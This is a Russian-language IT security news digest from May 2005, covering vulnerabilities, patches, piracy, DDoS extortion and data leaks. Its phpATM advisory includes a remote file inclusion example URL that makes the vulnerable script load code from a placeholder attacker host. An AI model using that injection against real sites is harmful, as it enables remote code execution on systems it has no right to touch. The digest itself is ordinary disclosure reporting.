Спустя полгода с лишним после обнародования информации о так называемом bluesnarfing - уязвимости, допускающей чтение, модификацию и копирование через BlueTooth адресной книги или календаря на ряде своих телефонов, Nokia объявила о том, что исправление этой проблемы готово для моделей 6230, 6650, 6810, 6820 и 7200, сообщает bugtraq.ru. Смогут ли пользователи самостоятельно обновлять свои трубки, компания не уточняет.
Подробности

19/05/2005 12:16 Уязвимости в OpenBSD и CISCO
Разработчики ОС OpenBSD сообщают о выпуске патча для версий 3.5 и 3.6 этой популярной ОС. Патчи связаны с устранением уязвимости в обработке опции временных меток (Timestamp) TCP-пакета. Атакующий способен, сформировав специальный пакет, вызвать DoS активной TCP-сессии, ооднако для этого ему необходимы знания об IP-адресах обоих сторон соединения. В версии OpenBSD уязвимость не существует. Подобная же уязвимость существует в ряде продуктов CISCO (роутеры и свичи SN5400, CSS11000, AP350, AP1200, MGX). CISCO также выпущен бюллетень по безопасности.
OpenBSD
Бюллетень от CISCO

19/05/2005 13:49 Солдаты сломали главный компьютер минобороны
Британские солдаты в Ираке на время вывели из строя центральный компьютер министерства обороны Великобритании. Сделали они это по неведению, переслав в Лондон по электронной почте шуточный видеоклип под песенку "Амарилло". Желающих скачать и посмотреть его оказалось так много, что центральный сервер военного ведомства не выдержал. Песенка "Амарилло" в исполнении Тони Кристи несколько недель возглавляла британский хит-парад. С телеэкранов не сходит видеоклип, в котором под нее пляшет комик Питер Кэй. Королевские драгунские гвардейцы на базе "Аль Фао" в Ираке сделали на любительской видеокамере свою пародию, назвав ее "Армадилло". Животное армадил, или броненосец, - это талисман танкистов. На кадрах засняты солдаты в экзотическом виде - кто-то раздобыл арабскую одежду, кто-то просто обмотался полотенцами, кто-то щеголяет в исподнем белье. Самый рискованный эпизод - это когда шутники дружно расселись по уборным, не прикрыв за собой дверцы. Но все трезвы, над иракцами не издеваются и вся забава выглядит вполне невинно. Как объяснил автор клипа сержант Роджер Парр, его сделали просто со скуки. Кто-то из обитателей базы отправил клип в виде приложения к электронному письму военным чиновникам в Лондоне. Те пришли от него в восторг и начали рассказывать о нем знакомым. Служащие в Лондоне стали рассылать знакомым приложение размером в 52 мегабайта. От большого количества скачиваний центральный сервер минобороны не выдержал. Электронная почта по всему ведомству оказалась парализована на несколько часов.
BBC

19/05/2005 14:55 Mail.Ru режет письма от Canon
На официальном сайте Canon-Россия в разделе «Обратная связь» появилось довольно любопытное предостережение. «Уважаемые посетители сайта, почтовая служба Mail.ru периодически помещает адреса @canon.ru в чёрный список. Таким образом, сотрудники Canon лишены возможности отвечать на вопросы тех из Вас, кто пользуется почтовой службой Mail.ru — наши письма не всегда проходят на адреса: @mail.ru, @inbox.ru, @bk.ru, @list.ru. Приносим свои извинения.» Судя по количеству людей, которые пользуются почтой на Mail.Ru, у Canon действительно серьезные проблемы с коммуникацией со своими покупателями.
Источник

21/05/2005 20:32 Нелегальная копия третьей части "Звездных войн" немедленно появилась в Интернете
Через несколько часов после начала мирового проката третьей части легендарной киноэпопеи "Звездные войны" нелегальная копия фильма появилась в Интернете. По данным агентства Reuters, в популярной файлообменной сети BitTorrent возникли как минимум две разных копии фильма. Одна из них содержит рабочий счетчик времени, что свидетельствует о том, что копия была украдена непосредственно из Голливуда, а не переснята видеокамерой в кинотеатре. Производитель фильма компания Lucasfilm официального комментария по этому поводу не дала, однако неофициальные источники агентства сообщили, что ее руководство узнало об утечке еще в среду и сейчас в компании идет разбирательство. Дистрибьютор 20th Century Fox также воздержался от комментариев. Оценку ситуации дали в Ассоциации американских кинопроизводителей MPAA, куда входит большинство кинокомпаний США. Ее президент Дэн Гликман (Dan Glickman) выступил с заявлением, в котором сказал: "Нет лучшего примера того, как воровство портит магию кинематографа, чем нынешний случай с BitTorent, которая предоставила пользователям нелегальные копии "Мести ситха". Печально то, что подобные случаи происходят на регулярной основе в файлообменных сетях во всем мире". Как известно, MPAA пытается противостоять интернет-пиратству, подавая судебные иски против уличенных в пиратстве пользователей в разных странах.
Источник

21/05/2005 21:13 SAP демонстрирует Mendocino в действии
В четверг производитель корпоративного ПО представил первые примеры бизнес-приложений, разработанных в технологическом партнерстве с Microsoft. На конференции заказчиков SAP Sapphire в Бостоне член правления и один из главных технологов Шай Агасси рассказал о выгодах, которые гигант корпоративных приложений получит от совместного с Microsoft проекта с кодовым названием Mendocino. Первые плоды общих усилий предстали перед участниками конференции в форме специализированной версии Microsoft Outlook, связанной с приложениями планирования корпоративных ресурсов (ERP) SAP. Агасси продемонстрировал, как можно непосредственно в Outlook получать информацию из таких приложений SAP, как система управления проектами или ПО учета кадров. Например, работник вводит в календарь Outlook данные об отработанных им часах, и они попадают прямо в приложение SAP, управляющее бизнес-проектом. Судя по демонстрации Агасси, Mendocino, по существу, представляет собой новую панель задач Outlook для заказчиков, использующих продукты обеих компаний. В другом примере было показано, как, не покидая интерфейса Outlook, можно получить данные, подготовленные аналитическим ПО SAP. Совместно разработанные инструменты появятся в продуктах SAP во втором полугодии будущего года, а с опытными версиями отдельные заказчики смогут ознакомиться в конце 2005 года.
Подробности

22/05/2005 09:15 VeriSign усилит инфраструктуру Сети
Компания VeriSign планирует существенно увеличить число своих DNS-серверов, что должно сделать ключевую часть инфраструктуры интернета более устойчивой к кибератакам. В будущем году VeriSign намеревается разместить дополнительные копии своего корневого сервера «J» системы доменных имен (Domain Name System) примерно в сотне вычислительных центров в разных странах. Об этом сообщил в четверг в интервью CNET News.com старший вице-президент VeriSign по инфраструктуре и операциям Аристотель Бало. Два корневых сервера компании (второй называется «А») составляют основу системы имен интернета. Впоследствии машины VeriSign, управляющие трафиком к серверу DNS «J», будут установлены еще более чем в 200 местах. Это отход от первоначальной стратегии нескольких серверов в центральных узлах интернета. В настоящее время у компании имеются копии сервера «J» в 18 городах. «Это расширение обеспечит резервирование и надежность, а главное, защитит от усиливающихся атак, которые мы испытываем», — сказал Бало на ежегодной конференции VeriSign для финансовых аналитиков в Редвуд-Сити (штат Калифорния). Свою расширенную инфраструктуру VeriSign планирует использовать не только для DNS, но и для других своих служб, таких как подтверждение сертификатов SSL (Secure Sockets Layer), которые широко применяются в онлайновой торговле для защиты транзакций. Это может ускорить веб-браузинг, особенно в будущем, когда значение сертификатов повысится. Новые серверы разместятся в Кейптауне, Тайбее, Гонконге, Мадриде, Варшаве, Сан-Паулу, а также в ряде городов Ближнего Востока. Оборудование VeriSign, устанавливаемое в каждом из новых центров, занимает всего около половины стандартной серверной стойки.
Подробнее

22/05/2005 09:47 Финальная версия Netscape 8 вышла с критическими дырами
В финальной версии браузера Netscape 8, вышедшей в минувший четверг, содержатся критические уязвимости, которые могут приводить к несанкционированному выполнению произвольного вредоносного кода на компьютере пользователя. Особенностью Netscape 8 является наличие двух движков - Trident, на котором основан Internet Explorer 6, и Gecko, используемого во всех версиях Mozilla и, в частности, Firefox. На веб-сайте разработчиков говорится, что Netscape 8 предоставляет пользователям такой выбор различных опций безопасности, какого больше нет ни в одном браузере. Действительно, Netscape 8 автоматически настраивает установки безопасности в соответствии с поставляемыми разработчиками "чёрными списками" веб-сайтов, через которые орудуют фишеры, распространяется шпионское ПО и т.д. Кроме того, браузер имеет цветовую индикацию уровня безопасности посещаемых сайтов. Однако программисты Mozilla Foundation указывают на то, что Netscape 8 далеко не так безопасен, как об этом говорят его создатели. Дело в том, что в Netscape 8 применен тот же движок, что и в Firefox 1.0.3. А в последнем не так давно были выявлены две очень опасные дыры, обеспечивающие возможность проведения XSS-атак (Cross-Site Scripting) и выполнения вредоносных операций на удаленном компьютере. Разработчики Firefox достаточно быстро устранили уязвимости, выпустив версию браузера с индексом 1.0.4. А вот в Netscape 8 эти дыры остались.
Подробности

22/05/2005 10:01 Уязвимость в phpATM
phpATM позволяет осуществить выполнение произвольного кода через удаленные инъекции, при условии установленного allow_url_fopen. Лист глобальных переменных $include_location используется с include() и может быть использован атакующим для запуска любого кода с привилегиями веб-пользователя. Проблема в безопасности находится в файле `include/common.php' рядом со строкой 91, где содержимое суперглобальных массивов переведено в глобальный контекст. Этим можно воспользоваться для переписывания ранее объявленной $include_location. Уязвимость подтверждена в версии 1.21, возможно наличие её и в более ранних. Пример атаки - http://victim/index.php?include_location=http://attacker/
Описание

22/05/2005 11:38 SQL-инъекция в Wordpress
Наиболее опасной уязвимостью релиза 1.5 является SQL инъекция в `wp-trackback.php', которую не так просто использовать, потому что вы не получите результата на правильные запросы.Однако присутствует возможность брутфорса различных значений в таблицах - например, хэшей паролей. Параметр `tb_id' файла `wp-trackback.php' некорректно подтверждается, а также, отсутствуют кавычки в SQL-запросах,что позволит вставку SQL-команд. Уязвимость присутствует в версии 1.5 и ранее и устранена в версии 1.5.1.
Подробности

22/05/2005 12:01 Обход защиты в Apple Mac OS X скринсейвере
Проблема появляется, когда пользователь блокирует экран. Когда скринсейвер стоит в режиме запрашивания пароля и пользователь начинает разблокировку, контекстные меню становятся доступны в режиме введения текста. Атакующий может частично обойти блокировку и отображать нежелательные веб сайты. Уязвимыми являются версии Apple Mac OS X 10.4, Apple Mac OS X Server 10.4. Для обоих версий выпущены обновления - Apple Upgrade MacOSXSvrUpdate.
Подробности

22/05/2005 12:26 Студент выпустил SP2 для Windows 98 SE
Пользователи Windows 98 Second Edition, обделенные программной поддержкой со стороны Microsoft, теперь могут приобрести service pack от турецкого студента, занимающегося компьютерными разработками, сообщает Computer Weekly. Алпер Коскан (Alper Coskun) представил свою 2-ю версию неофициального обновления Windows 98 SE Service Pack. Компания Microsoft никогда не выпускала SP для Windows 98 SE и закончила предоставлять бесплатную поддержку операционной системы в 2003 году. Сокан выпустил 1-ю бесплатную версию SP год назад. Новая «заплата» Коскана устраняет более 100 изъянов. Cуществуют также локализованные версии сервис-пака. Так, сервис-пак для русской версии Windows 98 SE проживает по адресу egorz.nm.ru, версия 1.6.1 занимает 12 мегабайт.
Cайт Алпера Коскана
Русская версия SP

22/05/2005 12:53 "Яндекс" выпустил антиспамовый фильтр
Компания «Яндекс» выпустила новый продукт под названием «Спамооборона», предназначенный для фильтрации спама в корпоративных почтовых системах. Работа «Спамообороны» основывается на статистике, собираемой на «Яндекс.Почте». Устойчивость «Спамообороны» к новым видам спама обеспечивается автоматическим обновлением базы признаков. Серверное решение работает на операционных системах FreeBSD и Linux и поддерживает такие почтовые серверы как Sendmail, CommunigatePro и Qmail. Продукт поступает в продажу с 19 мая. Защита почты обойдется около $1 за 1 ящик в месяц.
CNews

22/05/2005 13:31 Tor: распределенная система анонимного серфинга
Анонимайзер Tor был создан в исследовательской лаборатории Военно-морских сил США по федеральному заказу, но сейчас разработкой американских военных могут пользоваться все желающие. Система Tor обеспечивает высочайший уровень приватности во время серфинга в интернете, в чате и при отправке мгновенных сообщений через интернет-пейджер. Каждый пакет, попадающий в систему, проходит через три различных прокси-сервера (нода), которые выбираются случайным образом. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй, и, в конце концов, для первой. Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра (аналогия с тем, как чистят луковицу) и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом. Учитывая, что все ноды выбираются случайным образом, такая система максимально затрудняет отслеживание источника. Принцип использования распределенной сети анонимайзеров на порядок повышает уровень приватности по сравнению с обычными отдельными анонимайзерами, которые существуют в интернете уже довольно длительное время. Кроме того, Tor совершенно бесплатен. Распределенная система для обеспечения приватного серфинга была спроектирована в конце 90-х гг. по заказу правительства США. В 2002 г. эту разработку решили рассекретить, а исходные коды были переданы независимым разработчикам, которые создали клиентское ПО и опубликовали исходный код под свободной лицензией, чтобы все желающие могли проверить его на отсутствие багов и «закладок». К сожалению, даже открытые исходники клиентского ПО не дают абсолютной гарантии приватности, потому что слежка может осуществляться прямо на сервере, через который проходит трафик.
Подробнее о системе

22/05/2005 14:03 Уволенный инженер «Сферы Телеком» попался на шантаже
Уволенный инженер компании «Сфера Телеком» зашифровал базы данных в своем проекте и шантажировал бывшего работодателя, требуя денег. Типичный для России конфликт был решен с помощью РУБОП и ФСБ. Компания «Сфера Телеком», осуществляющая деятельность по системной интеграции, безопасности и комплексному обслуживанию IT-систем корпоративных клиентов, была замешана в историю, достойную настоящего детектива. В ночь с 23 на 24 апреля уволенный за недобросовестное отношение к обязанностям сотрудник «Сфера Телеком» Сенин Д. В. решил навредить своим бывшим работодателям. Инженер Сенин занимался построением сложных серверных узлов и объединением территориально-распределенных филиальных сетей клиентов на базе оборудования Cisco и IBM. Один из таких комплексных проектов находился на этапе сдачи на стороне клиента, крупной авиатранспортной компании. После того как Сенин был уволен, сотрудники «Сфера Телеком» изменили все пароли доступа к узлам, однако инженер нашел себе сообщника на стороне клиента и сумел, проникнув в закрытую область данных компании, зашифровать и заблокировать паролем доступ к базам данных бухгалтерского и управленческого учета, тем самым блокировав производственный процесс авиакомпании. Происшедшее вскрылось в понедельник утром, когда сотрудники авиакомпании пришли на работу. Действовать нужно было немедленно. Связавшись с руководством компании «Сфера Телеком», владельцы авиакомпании попытались совместными усилиями получить необходимый для разблокирования баз пароль у Сенина путем переговоров, но безрезультатно. Он требовал выкуп (возможно, невыплаченную зарплату). Руководители «Сфера Телеком» согласились сделать это, назначили встречу и обратились в ФСБ. К вечеру того же дня владельцами обеих компаний совместно с силами РУБОП и ФСБ была спланирована операция задержания Сенина. На следующее утро генеральный директор «Сферы Телеком», снабженный микрофонами, встретился с инженером для передачи денег. Получив деньги, хакер сообщил пароль, и работа авиакомпании была восстановлена. Деньги же оказались мечеными и сразу после их передачи сотрудники правоохранительных органов провели задержание.
"Вебпланета"

22/05/2005 14:46 Компании готовы платить организаторам DDoS-атак
Преступники все чаще атакуют корпоративные интернет-ресурсы посредством DDoS-атак не с целью выведения из строя сетей, а для вымогательства денег. При этом компании предпочитают выполнять требования преступников, а не ликвидировать последствия удачных DDoS-атак, пишет сайт Computerworld. Несмотря на то, что информация о преступлениях подобного рода распространяется уже в течение нескольких лет, большинство компаний отказываются сообщать о DDoS-атаках и принимать помощь правоохранительных органов. «Вымогательство распространяется все шире. Это случается с такой частотой, что теперь даже никто и бровью не ведет», — комментирует ситуацию руководитель подразделения информацию информационной безопасности компании AT&T Эд Амрозо (Ed Amoroso). «За последние 8 месяцев мы видели рост активности многих организованных преступных групп, пытающихся выманить деньги пользователей. Мы делаем все возможное, чтобы помочь клиентам справиться с этой проблемой, но оставляем на их совести обращение в полицию», — рассказал представитель компании MCI Inc, представляющей услуги в области информационной безопасности. Приводить точную статистику о преступлениях, связанных с интернет-вымогательством тяжело, потому что ФБР, провайдеры и исследовательские компании не представляют сведений о процентах «денежных» DDoS-атак. По словам пресс-секретаря ФБР Пола Брессона, его ведомство активно расследует случаи вымогательства с применением DDoS-атак. «Большинство этих преступных групп имеют международные связи. Зафиксировано не так много случаев, в которых атаки идут из США, и много случаев, когда для законов других государств эти преступления оказываются новыми», — рассказал Брессон. Многие жертвы вымогателей предпочитают платить деньги, чтобы избежать дурной молвы. Законы не запрещают платить вымогателям, и компании делают это, потому что ликвидировать последствия атак для них будет дороже. Для выхода из ситуации лучшим решением для компаний станет отказ от выплат вымогателям. Услуги AT&T и MCI по защите от DDoS-атак стоят около 12 тысяч долларов в месяц. С помощью программы Cisco Riverhead gear и утилит Arbor Networks удается отфильтровать до 99 процентов DDoS-трафика, утверждает аналитик компании Gartner Джон Пескаторе.
VirusList

22/05/2005 15:12 База данных Центробанка снова в продаже
За 3000 рублей можно купить информацию о банковских проводках за четвертый квартал 2004 года на трех DVD. По данным "Ведомостей", после первых публикаций сотрудникам банка отключили записывающие устройства в компьютерах - дисководы, USB-подключения и прочее. "Два месяца назад была введена новая система защиты и доступа", - говорит сотрудник ЦБ, по словам которого "обрывки баз могут появляться в продаже, но не далее чем за март 2005 года". По словам источника в ЦБ, внутреннее расследование не выявило виновных внутри банка, а его результаты ЦБ предоставил силовикам. Проверку по факту утечки сейчас ведет ФСБ, заявил "Ведомостям" близкий к следствию источник.
Подробнее

22/05/2005 15:45 На Microsoft подали в суд из-за Excel
Carlos Armando Amado утверждает, что в 1990 году запатентовал технологию, которая позволяла обмениваться данными между Excel и Access через крупноформатные таблицы. Через два года он втретился с представителями Microsoft с целью продать технологию. По словам истца, Microsoft начал использовать такую технологию в программе Access выпуска 1995 - 2002 годов. Microsoft отвергает эти заявления, говоря, что разработки данной технологии начались в 1989 - за три года до встречи с Amado. Адвокаты Amado сообщили, что будут требовать $2 доллара за каждую проданную копию программного обеспечения, что в общей сложности составляет около $500 миллионов долларов. Дело рассматривает Окружной суд в Центральной Калифорнии. Кроме этого, Microsoft судится по патентам на Longhorn, следующего поколения ОС Windows, с компанией Alacritech. Истцом является и Forgent Networks, которая утверждает, что софтверный гигант нарушает их патент на компрессию JPEG изображений.
Источник

22/05/2005 16:18 «Устраненная» уязвимость в KDE вновь дает о себе знать
Для устранения опасной уязвимости в безопасности популярной открытой графической среды для UNIX/Linux-систем KDE, обнаруженной около месяца назад, придется установить еще один патч. Проблема возникла в kdelibs, а точнее, в компоненте kimgio при обработке изображений в формате PCX. Kimgio исподьзуется в основанных на KHTML браузерах, а также таких KDE-приложениях, как kpresenter и ksnapshot. Уязвимость затрагивает версии KDE с 3.2 до 3.4 и позволяет злоумышленнику исполнять код, который может привести к получению контроля над системой. Патчи, вышедшие месяц назад, устранили основную часть проблемы, однако локальные пользователи до сих пор могут воспользоваться уязвимостью через файлы, хранящиеся во временном каталоге /tmp. Кроме того, проект KDE сообщил об обнаружении новой ошибки, связанной с проблемой совместимости с изображениями в формате RGB. Новый патч для KDE уже выпущен.
Nixp.Ru


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru